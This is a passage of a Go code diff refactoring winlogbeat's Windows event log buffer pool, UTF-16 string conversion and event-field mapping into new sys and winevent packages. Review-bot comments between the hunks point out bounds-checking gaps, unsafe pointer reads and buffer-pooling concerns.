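Review bot: `rename` removes only the leaf key, so once `ToEvent` has moved `winlog.error.code` and `winlog.error.message`, an empty `winlog.error` object may remain in the published event. This assumes `MapStr.Delete` does not prune empty parents, which is not visible in this diff. If so, a `_ = m.Delete("winlog.error")` in `ToEvent` after the renames, guarded by a check that the map is empty, would keep the document clean. The helper also discards the results of `m.Put` and `m.Delete`; writing `_, _ = m.Put(newKey, v)` and `_ = m.Delete(oldKey)`, as maputil.go does, makes that deliberate. The comment could add `// A missing oldKey is a no-op.`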
diff --git a/winlogbeat/include/fields.go b/winlogbeat/include/fields.go index 0e9a6e91c4e..0f93a13922c 100644 --- a/winlogbeat/include/fields.go +++ b/winlogbeat/include/fields.go @@ -32,5 +32,5 @@ func init() { // AssetBuildFieldsFieldsCommonYml returns asset data. // This is the base64 encoded gzipped contents of build/fields/fields.common.yml. func AssetBuildFieldsFieldsCommonYml() string { - return "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" + return "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" } diff --git a/winlogbeat/sys/buffer.go b/winlogbeat/sys/buffer.go index 97299a20913..d7721b5adc5 100644 --- a/winlogbeat/sys/buffer.go +++ b/winlogbeat/sys/buffer.go @@ -61,3 +61,24 @@ func (b *ByteBuffer) Bytes() []byte { func (b *ByteBuffer) Len() int { return b.offset } + +// PtrAt returns a pointer to the given offset of the buffer. +func (b *ByteBuffer) PtrAt(offset int) *byte { + if offset > b.offset-1 { + return nil + } + return &b.buf[offset] +} + +// Reserve reserves n bytes by increasing the buffer's length. It may allocate +// a new underlying buffer discarding any existing contents. +func (b *ByteBuffer) Reserve(n int) { + b.offset = n + + if n > cap(b.buf) { + // Allocate new larger buffer with len=n. + b.buf = make([]byte, n) + } else { + b.buf = b.buf[:n] + } +} diff --git a/winlogbeat/sys/bufferpool.go b/winlogbeat/sys/bufferpool.go new file mode 100644 index 00000000000..ed5bbebfbc6 --- /dev/null +++ b/winlogbeat/sys/bufferpool.go 
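Review bot: `PtrAt` in the buffer.go hunk checks only the upper bound, so a negative `offset` passes `offset > b.offset-1` and panics at `&b.buf[offset]`. The guard could read `if offset < 0 || offset >= b.offset { return nil }`. `Reserve` has the same gap for a negative `n`, which reaches `b.buf[:n]`. The doc comment should say that the pointer is valid only until a call that can replace the backing slice, such as `Reserve`. It should also say that nil is returned for an empty buffer, because the bookmark.go hunk passes `bb.PtrAt(0)` straight to `_EvtRender` and would hand over nil after `Reserve(0)`.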
@@ -0,0 +1,48 @@ +// Licensed to Elasticsearch B.V. under one or more contributor +// license agreements. See the NOTICE file distributed with +// this work for additional information regarding copyright +// ownership. Elasticsearch B.V. licenses this file to you under +// the Apache License, Version 2.0 (the "License"); you may +// not use this file except in compliance with the License. +// You may obtain a copy of the License at +// +// http://www.apache.org/licenses/LICENSE-2.0 +// +// Unless required by applicable law or agreed to in writing, +// software distributed under the License is distributed on an +// "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY +// KIND, either express or implied. See the License for the +// specific language governing permissions and limitations +// under the License. + +package sys + +import ( + "sync" +) + +// bufferPool contains a pool of PooledByteBuffer objects. +var bufferPool = sync.Pool{ + New: func() interface{} { return &PooledByteBuffer{ByteBuffer: NewByteBuffer(1024)} }, +} + +// PooledByteBuffer is an expandable buffer backed by a byte slice. +type PooledByteBuffer struct { + *ByteBuffer +} + +// NewPooledByteBuffer return a PooledByteBuffer from the pool. The returned value must +// be released with Free(). +func NewPooledByteBuffer() *PooledByteBuffer { + b := bufferPool.Get().(*PooledByteBuffer) + b.Reset() + return b +} + +// Free returns the PooledByteBuffer to the pool. +func (b *PooledByteBuffer) Free() { + if b == nil { + return + } + bufferPool.Put(b) +} diff --git a/winlogbeat/sys/strings.go b/winlogbeat/sys/strings.go index 12d91fac31d..d542277f17b 100644 --- a/winlogbeat/sys/strings.go +++ b/winlogbeat/sys/strings.go 
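Review bot: `Free` returns every buffer to `bufferPool` regardless of capacity, so one very large `Reserve` keeps that allocation alive in the pool. Whatever event bytes the buffer last held also stay in the backing array unless `Reset` clears them, which is not shown here. Since these buffers carry rendered event log content, consider dropping outliers with `if b == nil || cap(b.buf) > maxPooledBufferSize { return }`, where `maxPooledBufferSize` is a new package constant (the name is only a suggestion). The comment on `Free` should state that slices from `Bytes()` and pointers from `PtrAt` must not be used after `Free`, because the buffer may be handed to another caller. The `PooledByteBuffer` comment should mention that instances come from the pool.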
@@ -18,57 +18,23 @@ package sys import ( - "errors" - "fmt" "strings" - "unicode/utf16" -) - -var ErrBufferTooSmall = errors.New("buffer too small") - -// UTF16BytesToString returns a string that is decoded from the UTF-16 bytes. -// The byte slice must be of even length otherwise an error will be returned. -// The integer returned is the offset to the start of the next string with -// buffer if it exists, otherwise -1 is returned. -func UTF16BytesToString(b []byte) (string, int, error) { - if len(b)%2 != 0 { - return "", 0, fmt.Errorf("Slice must have an even length (length=%d)", len(b)) - } - offset := -1 - - // Find the null terminator if it exists and re-slice the b. - if nullIndex := indexNullTerminator(b); nullIndex > -1 { - if len(b) > nullIndex+2 { - offset = nullIndex + 2 - } - - b = b[:nullIndex] - } - - s := make([]uint16, len(b)/2) - for i := range s { - s[i] = uint16(b[i*2]) + uint16(b[(i*2)+1])<<8 - } - - return string(utf16.Decode(s)), offset, nil -} + "github.com/elastic/beats/v7/libbeat/common" +) -// indexNullTerminator returns the index of a null terminator within a buffer -// containing UTF-16 encoded data. If the null terminator is not found -1 is -// returned. -func indexNullTerminator(b []byte) int { - if len(b) < 2 { - return -1 - } +// UTF16BytesToString converts the given UTF-16 bytes to a string. +func UTF16BytesToString(b []byte) (string, error) { + // Use space from the ByteBuffer pool as working memory for the conversion. + bb := NewPooledByteBuffer() + defer bb.Free() - for i := 0; i < len(b); i += 2 { - if b[i] == 0 && b[i+1] == 0 { - return i - } + if err := common.UTF16ToUTF8Bytes(b, bb); err != nil { + return "", err } - return -1 + // This copies the UTF-8 bytes to create a string. + return string(bb.Bytes()), nil } // RemoveWindowsLineEndings replaces carriage return line feed (CRLF) with diff --git a/winlogbeat/sys/strings_test.go b/winlogbeat/sys/strings_test.go index 358e61ed6b2..0771b7b3cff 100644 
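Review bot: The new doc comment on `UTF16BytesToString` drops the contract the removed one spelled out. The old version returned an error for odd-length input and cut the result at the first null terminator, and the new text says neither. Whether `common.UTF16ToUTF8Bytes` keeps those properties is not visible in this hunk, so the comment should say what happens for odd-length slices and embedded nulls. A starting point is `// Errors from common.UTF16ToUTF8Bytes are returned unchanged.`, plus a line on null handling once confirmed. The result count also changed from three values to two, which is worth noting for callers outside this repository.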
--- a/winlogbeat/sys/strings_test.go +++ b/winlogbeat/sys/strings_test.go @@ -18,7 +18,6 @@ package sys import ( - "bytes" "testing" "github.com/stretchr/testify/assert" @@ -30,59 +29,13 @@ func TestUTF16BytesToString(t *testing.T) { input := "abc白鵬翔\u145A6" utf16Bytes := common.StringToUTF16Bytes(input) - output, _, err := UTF16BytesToString(utf16Bytes) + output, err := UTF16BytesToString(utf16Bytes) if err != nil { t.Fatal(err) } assert.Equal(t, input, output) } -func TestUTF16BytesToStringOffset(t *testing.T) { - in := bytes.Join([][]byte{common.StringToUTF16Bytes("one"), common.StringToUTF16Bytes("two"), common.StringToUTF16Bytes("three")}, []byte{0, 0}) - - output, offset, err := UTF16BytesToString(in) - if err != nil { - t.Fatal(err) - } - assert.Equal(t, "one", output) - assert.Equal(t, 8, offset) - - in = in[offset:] - output, offset, err = UTF16BytesToString(in) - if err != nil { - t.Fatal(err) - } - assert.Equal(t, "two", output) - assert.Equal(t, 8, offset) - - in = in[offset:] - output, offset, err = UTF16BytesToString(in) - if err != nil { - t.Fatal(err) - } - assert.Equal(t, "three", output) - assert.Equal(t, -1, offset) -} - -func TestUTF16BytesToStringOffsetWithEmptyString(t *testing.T) { - in := bytes.Join([][]byte{common.StringToUTF16Bytes(""), common.StringToUTF16Bytes("two")}, []byte{0, 0}) - - output, offset, err := UTF16BytesToString(in) - if err != nil { - t.Fatal(err) - } - assert.Equal(t, "", output) - assert.Equal(t, 2, offset) - - in = in[offset:] - output, offset, err = UTF16BytesToString(in) - if err != nil { - t.Fatal(err) - } - assert.Equal(t, "two", output) - assert.Equal(t, -1, offset) -} - func BenchmarkUTF16BytesToString(b *testing.B) { utf16Bytes := common.StringToUTF16Bytes("A logon was attempted using explicit credentials.") 
diff --git a/winlogbeat/sys/event.go b/winlogbeat/sys/winevent/event.go similarity index 71% rename from winlogbeat/sys/event.go rename to winlogbeat/sys/winevent/event.go index b6674d41f40..53c6b49abd5 100644 --- a/winlogbeat/sys/event.go +++ b/winlogbeat/sys/winevent/event.go @@ -15,19 +15,41 @@ // specific language governing permissions and limitations // under the License. -package sys +package winevent import ( "encoding/xml" "fmt" "strconv" + "strings" "time" + + "github.com/elastic/beats/v7/libbeat/common" + libxml "github.com/elastic/beats/v7/libbeat/common/encoding/xml" + "github.com/elastic/beats/v7/libbeat/logp" + "github.com/elastic/beats/v7/winlogbeat/sys" +) + +// Debug selectors used in this package. +const ( + debugSelector = "winevent" +) + +// Debug logging functions for this package. +var ( + debugf = logp.MakeDebug(debugSelector) ) -// UnmarshalEventXML unmarshals the given XML into a new Event. -func UnmarshalEventXML(rawXML []byte) (Event, error) { +// Keyword Constants +const ( + keywordAuditFailure = 0x10000000000000 + keywordAuditSuccess = 0x20000000000000 +) + +// UnmarshalXML unmarshals the given XML into a new Event. +func UnmarshalXML(rawXML []byte) (Event, error) { var event Event - decoder := xml.NewDecoder(newXMLSafeReader(rawXML)) + decoder := xml.NewDecoder(libxml.NewSafeReader(rawXML)) err := decoder.Decode(&event) return event, err } 
@@ -66,6 +88,70 @@ type Event struct { RenderErr []string } +func (e Event) Fields() common.MapStr { + // Windows Log Specific data + win := common.MapStr{} + + AddOptional(win, "channel", e.Channel) + AddOptional(win, "event_id", e.EventIdentifier.ID) + AddOptional(win, "provider_name", e.Provider.Name) + AddOptional(win, "record_id", e.RecordID) + AddOptional(win, "task", e.Task) + AddOptional(win, "computer_name", e.Computer) + AddOptional(win, "keywords", e.Keywords) + AddOptional(win, "opcode", e.Opcode) + AddOptional(win, "provider_guid", e.Provider.GUID) + AddOptional(win, "task", e.Task) + AddOptional(win, "version", e.Version) + AddOptional(win, "time_created", e.TimeCreated.SystemTime) + + if e.KeywordsRaw&keywordAuditFailure > 0 { + _, _ = win.Put("outcome", "failure") + } else if e.KeywordsRaw&keywordAuditSuccess > 0 { + _, _ = win.Put("outcome", "success") + } + + AddOptional(win, "level", strings.ToLower(e.Level)) + AddOptional(win, "message", sys.RemoveWindowsLineEndings(e.Message)) + + if e.User.Identifier != "" { + user := common.MapStr{ + "identifier": e.User.Identifier, + } + win["user"] = user + AddOptional(user, "domain", e.User.Domain) + AddOptional(user, "name", e.User.Name) + AddOptional(user, "type", e.User.Type.String()) + } + + AddPairs(win, "event_data", e.EventData.Pairs) + userData := AddPairs(win, "user_data", e.UserData.Pairs) + AddOptional(userData, "xml_name", e.UserData.Name.Local) + + // Correlation + AddOptional(win, "activity_id", e.Correlation.ActivityID) + AddOptional(win, "related_activity_id", e.Correlation.RelatedActivityID) + + // Execution + AddOptional(win, "kernel_time", e.Execution.KernelTime) + AddOptional(win, "process.pid", e.Execution.ProcessID) + AddOptional(win, "process.thread.id", e.Execution.ThreadID) + AddOptional(win, "processor_id", e.Execution.ProcessorID) + AddOptional(win, "processor_time", e.Execution.ProcessorTime) + AddOptional(win, "session_id", e.Execution.SessionID) + AddOptional(win, "user_time", 
e.Execution.UserTime) + + // Errors + AddOptional(win, "error.code", e.RenderErrorCode) + if len(e.RenderErr) == 1 { + AddOptional(win, "error.message", e.RenderErr[0]) + } else { + AddOptional(win, "error.message", e.RenderErr) + } + + return win +} + // Provider identifies the provider that logged the event. The Name and GUID // attributes are included if the provider used an instrumentation manifest to // define its events; otherwise, the EventSourceName attribute is included if a diff --git a/winlogbeat/sys/event_test.go b/winlogbeat/sys/winevent/event_test.go similarity index 97% rename from winlogbeat/sys/event_test.go rename to winlogbeat/sys/winevent/event_test.go index d4a4d2a564d..4ed391b91be 100644 --- a/winlogbeat/sys/event_test.go +++ b/winlogbeat/sys/winevent/event_test.go @@ -15,7 +15,7 @@ // specific language governing permissions and limitations // under the License. -package sys +package winevent import ( "encoding/json" @@ -154,7 +154,7 @@ func TestXML(t *testing.T) { } for _, test := range tests { - event, err := UnmarshalEventXML([]byte(test.xml)) + event, err := UnmarshalXML([]byte(test.xml)) if err != nil { t.Error(err) continue @@ -175,7 +175,7 @@ func TestXML(t *testing.T) { // when the event is decoded. func TestInvalidXML(t *testing.T) { evXML := strings.Replace(allXML, "%1", "\t \n\x1b", -1) - ev, err := UnmarshalEventXML([]byte(evXML)) + ev, err := UnmarshalXML([]byte(evXML)) assert.Equal(t, nil, err) assert.Equal(t, "Creating WSMan shell on server with ResourceUri: \t\r\n\\u001b", ev.Message) } 
@@ -236,14 +236,14 @@ const nonUnsignedIntVersion = ` // // Reference: https://docs.microsoft.com/en-us/windows/win32/wes/schema-version-systempropertiestype-element func TestInvalidVersion(t *testing.T) { - ev, err := UnmarshalEventXML([]byte(nonUnsignedIntVersion)) + ev, err := UnmarshalXML([]byte(nonUnsignedIntVersion)) assert.NoError(t, err) assert.EqualValues(t, 0, ev.Version) } func BenchmarkXMLUnmarshal(b *testing.B) { for i := 0; i < b.N; i++ { - _, err := UnmarshalEventXML([]byte(allXML)) + _, err := UnmarshalXML([]byte(allXML)) if err != nil { b.Fatal(err) } diff --git a/winlogbeat/sys/winevent/maputil.go b/winlogbeat/sys/winevent/maputil.go new file mode 100644 index 00000000000..41fe694c88e --- /dev/null +++ b/winlogbeat/sys/winevent/maputil.go 
@@ -0,0 +1,99 @@ +// Licensed to Elasticsearch B.V. under one or more contributor +// license agreements. See the NOTICE file distributed with +// this work for additional information regarding copyright +// ownership. Elasticsearch B.V. licenses this file to you under +// the Apache License, Version 2.0 (the "License"); you may +// not use this file except in compliance with the License. +// You may obtain a copy of the License at +// +// http://www.apache.org/licenses/LICENSE-2.0 +// +// Unless required by applicable law or agreed to in writing, +// software distributed under the License is distributed on an +// "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY +// KIND, either express or implied. See the License for the +// specific language governing permissions and limitations +// under the License. + +package winevent + +import ( + "fmt" + "reflect" + + "github.com/elastic/beats/v7/libbeat/common" + "github.com/elastic/beats/v7/winlogbeat/sys" +) + +// AddOptional adds a key and value to the given MapStr if the value is not the +// zero value for the type of v. It is safe to call the function with a nil +// MapStr. +func AddOptional(m common.MapStr, key string, v interface{}) { + if m != nil && !isZero(v) { + _, _ = m.Put(key, v) + } +} + +// AddPairs adds a new dictionary to the given MapStr. The key/value pairs are +// added to the new dictionary. If any keys are duplicates, the first key/value +// pair is added and the remaining duplicates are dropped. +// +// The new dictionary is added to the given MapStr and it is also returned for +// convenience purposes. +func AddPairs(m common.MapStr, key string, pairs []KeyValue) common.MapStr { + if len(pairs) == 0 { + return nil + } + + h := make(common.MapStr, len(pairs)) + for i, kv := range pairs { + // Ignore empty values. + if kv.Value == "" { + continue + } + + // If the key name is empty or if it the default of "Data" then + // assign a generic name of paramN. 
+ k := kv.Key + if k == "" || k == "Data" { + k = fmt.Sprintf("param%d", i+1) + } + + // Do not overwrite. + _, err := h.GetValue(k) + if err == common.ErrKeyNotFound { + _, _ = h.Put(k, sys.RemoveWindowsLineEndings(kv.Value)) + } else { + debugf("Dropping key/value (k=%s, v=%s) pair because key already "+ + "exists. event=%+v", k, kv.Value, m) + } + } + + if len(h) == 0 { + return nil + } + + _, _ = m.Put(key, h) + + return h +} + +// isZero return true if the given value is the zero value for its type. +func isZero(i interface{}) bool { + v := reflect.ValueOf(i) + switch v.Kind() { + case reflect.Array, reflect.String: + return v.Len() == 0 + case reflect.Bool: + return !v.Bool() + case reflect.Int, reflect.Int8, reflect.Int16, reflect.Int32, reflect.Int64: + return v.Int() == 0 + case reflect.Uint, reflect.Uint8, reflect.Uint16, reflect.Uint32, reflect.Uint64, reflect.Uintptr: + return v.Uint() == 0 + case reflect.Float32, reflect.Float64: + return v.Float() == 0 + case reflect.Interface, reflect.Map, reflect.Ptr, reflect.Slice: + return v.IsNil() + } + return false +} diff --git a/winlogbeat/sys/sid.go b/winlogbeat/sys/winevent/sid.go similarity index 99% rename from winlogbeat/sys/sid.go rename to winlogbeat/sys/winevent/sid.go index 1f09c1b8f8f..9c162f189e5 100644 --- a/winlogbeat/sys/sid.go +++ b/winlogbeat/sys/winevent/sid.go @@ -15,7 +15,7 @@ // specific language governing permissions and limitations // under the License. -package sys +package winevent import ( "fmt" diff --git a/winlogbeat/sys/sid_test.go b/winlogbeat/sys/winevent/sid_test.go similarity index 98% rename from winlogbeat/sys/sid_test.go rename to winlogbeat/sys/winevent/sid_test.go index ec984f1b05f..aced1a3921a 100644 --- a/winlogbeat/sys/sid_test.go +++ b/winlogbeat/sys/winevent/sid_test.go @@ -17,7 +17,7 @@ // +build !integration -package sys +package winevent import ( "testing" 
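Review bot: In `AddPairs` the duplicate check `_, err := h.GetValue(k)` treats every error other than `common.ErrKeyNotFound` as "key already exists". In addition, `GetValue` and `Put` presumably interpret dots in `k` as a path, where the removed code used the flat lookup `h[k]`; the MapStr implementation is not shown here, so this is inferred. Key names come from the event's own data, so a name containing a dot, or one that collides with a prefix of an earlier key, may end up nested or be dropped with a misleading debug line, losing telemetry. If flat keys are intended, `if _, exists := h[k]; !exists { h[k] = sys.RemoveWindowsLineEndings(kv.Value) }` keeps the previous behaviour. Otherwise handle `err != nil && err != common.ErrKeyNotFound` separately and log the real error.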
diff --git a/winlogbeat/sys/sid_windows.go b/winlogbeat/sys/winevent/sid_windows.go similarity index 98% rename from winlogbeat/sys/sid_windows.go rename to winlogbeat/sys/winevent/sid_windows.go index 23fb3f04879..001782556fa 100644 --- a/winlogbeat/sys/sid_windows.go +++ b/winlogbeat/sys/winevent/sid_windows.go @@ -15,7 +15,7 @@ // specific language governing permissions and limitations // under the License. -package sys +package winevent import "golang.org/x/sys/windows" diff --git a/winlogbeat/sys/wineventlog/bookmark.go b/winlogbeat/sys/wineventlog/bookmark.go index fa806aa2c34..db9d3d14452 100644 --- a/winlogbeat/sys/wineventlog/bookmark.go +++ b/winlogbeat/sys/wineventlog/bookmark.go @@ -24,6 +24,8 @@ import ( "github.com/pkg/errors" "golang.org/x/sys/windows" + + "github.com/elastic/beats/v7/winlogbeat/sys" ) // Bookmark is a handle to an event log bookmark. @@ -43,16 +45,16 @@ func (b Bookmark) XML() (string, error) { return "", errors.Wrap(err, "failed to determine necessary buffer size for EvtRender") } - bb := newByteBuffer() + bb := sys.NewPooledByteBuffer() bb.Reserve(int(bufferUsed * 2)) - defer bb.free() + defer bb.Free() - err = _EvtRender(NilHandle, EvtHandle(b), EvtRenderBookmark, uint32(len(bb.buf)), &bb.buf[0], &bufferUsed, nil) + err = _EvtRender(NilHandle, EvtHandle(b), EvtRenderBookmark, uint32(bb.Len()), bb.PtrAt(0), &bufferUsed, nil) if err != nil { return "", errors.Wrap(err, "failed to render bookmark XML") } - return UTF16BytesToString(bb.buf) + return sys.UTF16BytesToString(bb.Bytes()) } // NewBookmarkFromEvent returns a Bookmark pointing to the given event record. diff --git a/winlogbeat/sys/wineventlog/bufferpool.go b/winlogbeat/sys/wineventlog/bufferpool.go deleted file mode 100644 index 90bdf825de1..00000000000 --- a/winlogbeat/sys/wineventlog/bufferpool.go +++ /dev/null 
@@ -1,113 +0,0 @@ -// Licensed to Elasticsearch B.V. under one or more contributor -// license agreements. See the NOTICE file distributed with -// this work for additional information regarding copyright -// ownership. Elasticsearch B.V. licenses this file to you under -// the Apache License, Version 2.0 (the "License"); you may -// not use this file except in compliance with the License. -// You may obtain a copy of the License at -// -// http://www.apache.org/licenses/LICENSE-2.0 -// -// Unless required by applicable law or agreed to in writing, -// software distributed under the License is distributed on an -// "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY -// KIND, either express or implied. See the License for the -// specific language governing permissions and limitations -// under the License. - -package wineventlog - -import ( - "sync" - - "github.com/elastic/beats/v7/libbeat/common" -) - -// bufferPool contains a pool of byteBuffer objects. -var bufferPool = sync.Pool{ - New: func() interface{} { return &byteBuffer{buf: make([]byte, 1024)} }, -} - -// byteBuffer is an expandable buffer backed by a byte slice. -type byteBuffer struct { - buf []byte - offset int -} - -// newByteBuffer return a byteBuffer from the pool. The returned value must -// be released with free(). -func newByteBuffer() *byteBuffer { - b := bufferPool.Get().(*byteBuffer) - b.Reset() - return b -} - -// free returns the byteBuffer to the pool. -func (b *byteBuffer) free() { - if b == nil { - return - } - bufferPool.Put(b) -} - -// Write appends the contents of p to the buffer, growing the buffer as needed. -// The return value is the length of p; err is always nil. This implements -// io.Writer. -func (b *byteBuffer) Write(p []byte) (int, error) { - if len(b.buf) < b.offset+len(p) { - // Create a buffer larger than needed so we don't spend lots of time - // allocating and copying. 
- spaceNeeded := len(b.buf) - b.offset + len(p) - largerBuf := make([]byte, 2*len(b.buf)+spaceNeeded) - copy(largerBuf, b.buf[:b.offset]) - b.buf = largerBuf - } - n := copy(b.buf[b.offset:], p) - b.offset += n - return n, nil -} - -// Reset resets the buffer to be empty. It retains the same underlying storage -// capacity. -func (b *byteBuffer) Reset() { - b.offset = 0 - b.buf = b.buf[:cap(b.buf)] -} - -// Bytes returns a slice of length b.Len() holding the bytes that have been -// written to the buffer. -func (b *byteBuffer) Bytes() []byte { - return b.buf[:b.offset] -} - -// Len returns the number of bytes that have been written to the buffer. -func (b *byteBuffer) Len() int { - return b.offset -} - -// Reserve reserves n bytes by increasing the buffer's length. It may allocate -// a new underlying buffer discarding any existing contents. -func (b *byteBuffer) Reserve(n int) { - b.offset = n - - if n > cap(b.buf) { - // Allocate new larger buffer with len=n. - b.buf = make([]byte, n) - } else { - b.buf = b.buf[:n] - } -} - -// UTF16BytesToString converts the given UTF-16 bytes to a string. -func UTF16BytesToString(b []byte) (string, error) { - // Use space from the byteBuffer pool as working memory for the conversion. - bb := newByteBuffer() - defer bb.free() - - if err := common.UTF16ToUTF8Bytes(b, bb); err != nil { - return "", err - } - - // This copies the UTF-8 bytes to create a string. - return string(bb.Bytes()), nil -} diff --git a/winlogbeat/sys/wineventlog/format_message.go b/winlogbeat/sys/wineventlog/format_message.go index e8befcdeae3..29182d6f6a0 100644 --- a/winlogbeat/sys/wineventlog/format_message.go +++ b/winlogbeat/sys/wineventlog/format_message.go @@ -24,6 +24,8 @@ import ( "github.com/pkg/errors" "golang.org/x/sys/windows" + + "github.com/elastic/beats/v7/winlogbeat/sys" ) // getMessageStringFromHandle returns the message for the given eventHandle. 
@@ -82,11 +84,11 @@ func evtFormatMessage(metadataHandle EvtHandle, eventHandle EvtHandle, messageID } // Get a buffer from the pool and adjust its length. - bb := newByteBuffer() - defer bb.free() + bb := sys.NewPooledByteBuffer() + defer bb.Free() bb.Reserve(int(bufferUsed * 2)) - err = _EvtFormatMessage(metadataHandle, eventHandle, messageID, valuesCount, valuesPtr, messageFlag, uint32(len(bb.buf)/2), &bb.buf[0], &bufferUsed) + err = _EvtFormatMessage(metadataHandle, eventHandle, messageID, valuesCount, valuesPtr, messageFlag, uint32(bb.Len()/2), bb.PtrAt(0), &bufferUsed) if err != nil { switch err { // Ignore some errors so it can tolerate missing or mismatched parameter values. @@ -98,5 +100,5 @@ func evtFormatMessage(metadataHandle EvtHandle, eventHandle EvtHandle, messageID } } - return UTF16BytesToString(bb.buf) + return sys.UTF16BytesToString(bb.Bytes()) } diff --git a/winlogbeat/sys/wineventlog/metadata_store.go b/winlogbeat/sys/wineventlog/metadata_store.go index e59294f6276..fe94c03e168 100644 --- a/winlogbeat/sys/wineventlog/metadata_store.go +++ b/winlogbeat/sys/wineventlog/metadata_store.go @@ -30,6 +30,7 @@ import ( "github.com/elastic/beats/v7/libbeat/logp" "github.com/elastic/beats/v7/winlogbeat/sys" + "github.com/elastic/beats/v7/winlogbeat/sys/winevent" ) var ( @@ -295,7 +296,7 @@ func newEventMetadataFromEventHandle(publisher *PublisherMetadata, eventHandle E // By parsing the XML we can get the names of the parameters even if the // publisher metadata is unavailable or is out of sync with the events. - event, err := sys.UnmarshalEventXML([]byte(xml)) + event, err := winevent.UnmarshalXML([]byte(xml)) if err != nil { return nil, errors.Wrap(err, "failed to unmarshal XML") } diff --git a/winlogbeat/sys/wineventlog/renderer.go b/winlogbeat/sys/wineventlog/renderer.go index 4a6fcc2fef1..d52f4399fa2 100644 --- a/winlogbeat/sys/wineventlog/renderer.go +++ b/winlogbeat/sys/wineventlog/renderer.go 
@@ -35,6 +35,7 @@ import ( "github.com/elastic/beats/v7/libbeat/logp" "github.com/elastic/beats/v7/winlogbeat/sys" + "github.com/elastic/beats/v7/winlogbeat/sys/winevent" ) const ( @@ -93,8 +94,8 @@ func (r *Renderer) Close() error { } // Render renders the event handle into an Event. -func (r *Renderer) Render(handle EvtHandle) (*sys.Event, error) { - event := &sys.Event{} +func (r *Renderer) Render(handle EvtHandle) (*winevent.Event, error) { + event := &winevent.Event{} if err := r.renderSystem(handle, event); err != nil { return nil, errors.Wrap(err, "failed to render system properties") @@ -175,19 +176,19 @@ func (r *Renderer) getPublisherMetadata(publisher string) (*publisherMetadataSto } // renderSystem writes all the system context properties into the event. -func (r *Renderer) renderSystem(handle EvtHandle, event *sys.Event) error { +func (r *Renderer) renderSystem(handle EvtHandle, event *winevent.Event) error { bb, propertyCount, err := r.render(r.systemContext, handle) if err != nil { return errors.Wrap(err, "failed to get system values") } - defer bb.free() + defer bb.Free() for i := 0; i < int(propertyCount); i++ { property := EvtSystemPropertyID(i) offset := i * int(sizeofEvtVariant) - evtVar := (*EvtVariant)(unsafe.Pointer(&bb.buf[offset])) + evtVar := (*EvtVariant)(unsafe.Pointer(bb.PtrAt(offset))) - data, err := evtVar.Data(bb.buf) + data, err := evtVar.Data(bb.Bytes()) if err != nil || data == nil { continue } @@ -208,7 +209,7 @@ func (r *Renderer) renderSystem(handle EvtHandle, event *sys.Event) error { case EvtSystemOpcode: event.OpcodeRaw = data.(uint8) case EvtSystemKeywords: - event.KeywordsRaw = sys.HexInt64(data.(hexInt64)) + event.KeywordsRaw = winevent.HexInt64(data.(hexInt64)) case EvtSystemTimeCreated: event.TimeCreated.SystemTime = data.(time.Time) case EvtSystemEventRecordId: 
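Review bot: In renderSystem the cast `(*EvtVariant)(unsafe.Pointer(bb.PtrAt(offset)))` reads sizeofEvtVariant bytes starting at `offset` without comparing the end of that range with `bb.Len()`, so the loop trusts `propertyCount` to match the size of the rendered buffer. The old `&bb.buf[offset]` at least bounds-checked the first byte; whether PtrAt does the same is not visible here. A guard before the cast keeps a short buffer from becoming an out-of-range read: `if offset+int(sizeofEvtVariant) > bb.Len() { break }`. renderUser has the same cast in its loop, and both function bodies continue outside the hunks shown.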
@@ -230,9 +231,9 @@ func (r *Renderer) renderSystem(handle EvtHandle, event *sys.Event) error { event.User.Identifier = sid.String() var accountType uint32 event.User.Name, event.User.Domain, accountType, _ = sid.LookupAccount("") - event.User.Type = sys.SIDType(accountType) + event.User.Type = winevent.SIDType(accountType) case EvtSystemVersion: - event.Version = sys.Version(data.(uint8)) + event.Version = winevent.Version(data.(uint8)) } } @@ -242,12 +243,12 @@ func (r *Renderer) renderSystem(handle EvtHandle, event *sys.Event) error { // renderUser returns the event/user data values. This does not provide the // parameter names. It computes a fingerprint of the values types to help the // caller match the correct names to the returned values. -func (r *Renderer) renderUser(handle EvtHandle, event *sys.Event) (values []interface{}, fingerprint uint64, err error) { +func (r *Renderer) renderUser(handle EvtHandle, event *winevent.Event) (values []interface{}, fingerprint uint64, err error) { bb, propertyCount, err := r.render(r.userContext, handle) if err != nil { return nil, 0, errors.Wrap(err, "failed to get user values") } - defer bb.free() + defer bb.Free() if propertyCount == 0 { return nil, 0, nil @@ -261,10 +262,10 @@ func (r *Renderer) renderUser(handle EvtHandle, event *sys.Event) (values []inte values = make([]interface{}, propertyCount) for i := 0; i < propertyCount; i++ { offset := i * int(sizeofEvtVariant) - evtVar := (*EvtVariant)(unsafe.Pointer(&bb.buf[offset])) + evtVar := (*EvtVariant)(unsafe.Pointer(bb.PtrAt(offset))) binary.Write(argumentHash, binary.LittleEndian, uint32(evtVar.Type)) - values[i], err = evtVar.Data(bb.buf) + values[i], err = evtVar.Data(bb.Bytes()) if err != nil { r.log.Warnw("Failed to read event/user data value. Using nil.", "provider", event.Provider.Name, 
@@ -281,7 +282,7 @@ func (r *Renderer) renderUser(handle EvtHandle, event *sys.Event) (values []inte // render uses EvtRender to event data. The caller must free() the returned when // done accessing the bytes. -func (r *Renderer) render(context EvtHandle, eventHandle EvtHandle) (*byteBuffer, int, error) { +func (r *Renderer) render(context EvtHandle, eventHandle EvtHandle) (*sys.PooledByteBuffer, int, error) { var bufferUsed, propertyCount uint32 err := _EvtRender(context, eventHandle, EvtRenderEventValues, 0, nil, &bufferUsed, &propertyCount) @@ -293,12 +294,12 @@ func (r *Renderer) render(context EvtHandle, eventHandle EvtHandle) (*byteBuffer return nil, 0, nil } - bb := newByteBuffer() + bb := sys.NewPooledByteBuffer() bb.Reserve(int(bufferUsed)) - err = _EvtRender(context, eventHandle, EvtRenderEventValues, uint32(len(bb.buf)), &bb.buf[0], &bufferUsed, &propertyCount) + err = _EvtRender(context, eventHandle, EvtRenderEventValues, uint32(bb.Len()), bb.PtrAt(0), &bufferUsed, &propertyCount) if err != nil { - bb.free() + bb.Free() return nil, 0, errors.Wrap(err, "failed in EvtRender") } @@ -306,7 +307,7 @@ func (r *Renderer) render(context EvtHandle, eventHandle EvtHandle) (*byteBuffer } // addEventData adds the event/user data values to the event. -func (r *Renderer) addEventData(evtMeta *eventMetadata, values []interface{}, event *sys.Event) { +func (r *Renderer) addEventData(evtMeta *eventMetadata, values []interface{}, event *winevent.Event) { if 